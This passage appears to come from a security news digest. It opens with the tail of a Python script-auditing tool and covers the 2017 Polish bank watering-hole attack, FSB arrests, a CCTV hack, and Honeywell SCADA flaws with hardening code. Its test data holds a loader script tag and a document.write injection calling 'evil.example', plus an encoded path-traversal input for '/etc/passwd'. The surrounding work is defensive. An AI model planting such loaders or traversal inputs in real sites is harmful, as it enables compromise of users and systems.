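<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.js"
        integrity="sha384-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        crossorigin="anonymous"></script>
<script src="//cdn.example/analytics.js"></script>
<script src="https://evil.example/loader.js"></script>
</head><body>regulator site</body></html>
"""

if __name__ == "__main__":
    for kind, src in audit_scripts(SAMPLE_HTML, PAGE_ORIGIN, ALLOWED_ORIGINS):
        print(kind, src)
    tampered = {"/static/app.js": KNOWN_GOOD_APP_JS + b"document.write('<script src=\"//evil.example/l.js\"></script>');\n"}
    print("changed:", changed_files(tampered, BASELINE))
```

The audit is only as good as the fetch: run it from outside the corporate network with a browser-like client, because a watering-hole loader is often served conditionally by User-Agent, source address or time of day, and compare inline scripts too, since an injected loader need not have a src attribute at all.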
Both the KNF and the Polish government have since told local Polish media that there is no indication that people's money was touched and have given tentative assurances that no operations were affected. But they also stressed that investigations were ongoing.
The situation is being seen as the most serious attack ever on the Polish banking industry.

Sophos to assimilate Invincea's intelligent machine tech to fight malware

Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.
Invincea makes a line of signature-less endpoint protection technologies that rely on machine learning and behavioural monitoring to block malware.
Sophos plans to integrate Invincea's tech into the Sophos Central endpoint product line before releasing revamped products later this year. The plan parallels the integration of SurfRight's technology into Sophos's product line following a smaller December 2015 acquisition.
In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.
Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.
Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be "broadly neutral" to its balance sheet in its first year before adding to its revenues thereafter.
Sophos CEO Kris Hagerman commented: "Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos's leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity."

Cyberbit to Launch Cybersecurity Training Facility in Japan

Together with Ni Cybersecurity, Elbit Systems' subsidiary will launch a cybersecurity training and simulation center in Tokyo, addressing the growing cybersecurity skill shortage before the 2020 Olympics
Elbit Systems announced today that its subsidiary Cyberbit was awarded a contract from Ni Cybersecurity, the Japanese cybersecurity service provider, to launch a cybersecurity training and simulation center in Tokyo powered by the Cyberbit Range platform.
Ni Cybersecurity will set up a training facility in Toranomon, Tokyo, that will address the skills shortage by accelerating the certification of new cybersecurity experts and helping organizations improve the skills of their existing staff, focusing on government and finance organizations. The contract, in an amount that is not material to Elbit Systems, will be performed during 2017.
The new training facility will be powered by the Cyberbit Range, a cybersecurity training and simulation platform. It enables trainees to practice in real-life settings by accurately replicating their network setup, using their actual security tools and simulating their typical network traffic. The Range provides a selection of simulated attack scenarios, including ransomware. It is the underlying platform for multiple training centers in North America, Asia and Europe.
Adi Dar, Cyberbit’s CEO said, “When there is a need to certify tens of thousands of new cybersecurity experts while improving the skills of existing ones, all within a very short timeframe, enrollment in simulated training programs is the best choice for finance, government and other organizations in Japan. I am confident that the initiative, led by Ni Cybersecurity, powered by our Range platform, will contribute to Japan’s cyber readiness for the 2020 Olympic Games, and for years to follow."
Takeshi Mitsuishi, President and CEO of Ni Cybersecurity, said, “We selected the global leading cyber range platform, and we’re taking it to the Japanese market by opening our new training center in Tokyo, launching in Toranomon. Based on the global success of the Cyberbit Range, our customers can expect exceptional quality training, faster certification, and overall more qualified and skilled cyber security personnel.”

Sunday, 5 February 2017


Two of Moscow’s top cybersecurity officials are facing treason charges for cooperating with the CIA. The accusations add further intrigue to a mysterious scandal that has had the Moscow rumour mill working in overdrive for the past week, and come not long after US intelligence accused Russia of interfering in the US election and hacking the Democratic party’s servers.

Sergei Mikhailov was deputy head of the FSB security agency’s Centre for Information Security. His arrest was reported in a series of leaks over the past week, along with that of his deputy and several civilians.

According to earlier reports in the Russian media, Mikhailov was arrested some time ago, in theatrical fashion, during a plenary session of the top FSB leadership: a bag was placed over his head and he was marched out of the room, accused of treason.

His deputy, Dokuchayev, is believed to be a well-known Russian hacker who went by the nickname Forb, and began working for the FSB some years ago to evade jail for his hacking activities. Together with the two FSB officers, Ruslan Stoyanov, the head of the computer incidents investigations unit at cybersecurity firm Kaspersky Lab, was also arrested several weeks ago.

Kaspersky confirmed last week that Stoyanov had been arrested and was being held in a Moscow prison, though it said the arrest was not linked to his work for the company. Interfax said four people had been arrested and a further eight were potential witnesses in the case.

On Tuesday, Life, an online news portal with close links to the security services, reported that FSB agents had searched Mikhailov’s home and dacha and found more than $12m (£10m) in cash stashed in various hiding places.

Two arrested in London over hacking of US CCTV systems days before President Trump’s inauguration

Detectives have arrested two people in London on suspicion of hacking Washington's CCTV system ahead of President Donald Trump's inauguration.
The home of a British man, aged 50, and a Swedish woman, also 50, was raided in Streatham, south London on January 19.
It comes as storage devices which record data from police surveillance cameras in the American capital were allegedly compromised between January 12 and 15.
Hackers disabled 123 of 187 security cameras in Washington, triggering a major security incident.
It is believed the first cyber attack could have been a dry run, with another potentially planned for the presidential handover.

The National Crime Agency said: "Enquiries are ongoing and we are unable to provide further information at this time."
The couple have been bailed until April. Neighbours of the man and woman arrested said they keep themselves to themselves.
Police cars and officers raided the residential road at around 5.30pm. A woman who lives near the raided house said: "My sister had just come back from work and saw a couple of police cars around 5.30pm.
"Then later more cars turned up and we could see the blue lights filling the whole house.
"They keep themselves to themselves.
"This is a quiet street and there's never any trouble round here."
Another neighbour, who did not want to be named, said: "I saw a lot of police arrive a few weeks ago.
"I don't know what it was about, but I saw them go in the house.
"I've spoken to the guy a few times, he seems really nice and we often have a chat in the street."

Honeywell SCADA Controllers Exposed Passwords in Clear Text

A series of remotely exploitable vulnerabilities exist in a popular web-based SCADA system made by Honeywell that make it easy to expose passwords and in turn, give attackers a foothold into the vulnerable network.
The flaws exist in some versions of Honeywell’s XL Web II controllers, systems deployed across the critical infrastructure sector, including wastewater, energy, and manufacturing companies.
An advisory from the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) warned about the vulnerabilities Thursday.

According to ICS-CERT, the vulnerable versions are Honeywell’s XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. The company has developed a fixed version to address the issues, but users have to call their local Honeywell Building Solutions branch to receive the update, according to the company.
The controllers suffer from five vulnerabilities in total, but the most alarming is that passwords for the controllers are stored in clear text. Worse, an attacker could disclose that password simply by requesting a particular URL.
An attacker could also carry out a path traversal attack by accessing a specific URL, open and change certain parameters through another URL, or establish a new user session. The problem with starting a new user session is that the controllers did not invalidate existing session identifiers, a session fixation weakness that could have made it easier for an attacker to take over active authenticated sessions.
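The three weaknesses in that paragraph (clear-text credential storage, path traversal through a request URL, and a login that keeps the session identifier the client already had) each have a short correct form, and seeing the vulnerable and hardened versions side by side makes the fixes concrete. The code below is an added illustration written for this page; it is not Honeywell's firmware or anything from the ICS-CERT advisory or Rupp's write-up, and the web root, session ids, user names and passwords in it are invented.

```python
import hashlib
import hmac
import posixpath
import secrets
from urllib.parse import unquote


class SessionStore:
    """In-memory session table: session id -> authenticated user."""

    def __init__(self):
        self.sessions = {}


def login_vulnerable(store, presented_sid, user, password_ok):
    """Fixation-prone: an id the client already holds stays valid and becomes authenticated."""
    sid = presented_sid or secrets.token_urlsafe(32)
    if password_ok:
        store.sessions[sid] = user
    return sid


def login_hardened(store, presented_sid, user, password_ok):
    """Drops whatever id the client presented and issues a fresh one only after authentication."""
    store.sessions.pop(presented_sid, None)
    if not password_ok:
        return None
    sid = secrets.token_urlsafe(32)
    store.sessions[sid] = user
    return sid


def fixation_demo():
    """Attacker plants a known id on the victim; victim logs in. Who ends up with access?"""
    planted = "attacker-known-session-id"
    weak, strong = SessionStore(), SessionStore()
    login_vulnerable(weak, planted, "operator", password_ok=True)
    fresh = login_hardened(strong, planted, "operator", password_ok=True)
    return {
        "vulnerable_attacker_has_session": weak.sessions.get(planted) == "operator",
        "hardened_attacker_has_session": planted in strong.sessions,
        "hardened_rotated_id": fresh != planted,
    }


def resolve_under_root(webroot, requested):
    """Map a request path to a file under webroot; returns None on any traversal attempt."""
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, unquote(requested).lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


PBKDF2_ROUNDS = 200_000  # assumed work factor; tune to the controller's CPU budget


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256 instead of the clear-text storage the advisory describes."""
    salt = salt or secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify_password(password, salt, digest):
    """Constant-time comparison so the check itself does not leak the stored digest."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(fixation_demo())
    print(resolve_under_root("/var/www", "pages/index.html"))
    print(resolve_under_root("/var/www", "%2e%2e/%2e%2e/etc/passwd"))
    salt, digest = hash_password("operator-pass")
    print(verify_password("operator-pass", salt, digest), verify_password("guess", salt, digest))
```

The traversal check decodes once and then compares the normalised path against the root with a trailing slash, which also rejects sibling directories such as /var/www-backup; a resolver that only strips literal "../" sequences misses the percent-encoded form that the advisory's URL-based attacks rely on.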
Maxim Rupp, an independent security researcher based in Germany, dug up the bugs and teased them on Twitter at the beginning of January. He described them in depth in a blog post earlier this week.

Rupp has identified bugs in Honeywell equipment before. Two years ago he discovered a pair of vulnerabilities in Tuxedo Touch, a home automation controller made by the company, that could have let an attacker unlock a house’s doors or modify its climate controls.
It’s unclear how widespread the usage of Honeywell’s XL Web II controllers is. While Honeywell is a US-based company, according to ICS-CERT’s advisory the majority of the affected products are used in Europe and the Middle East.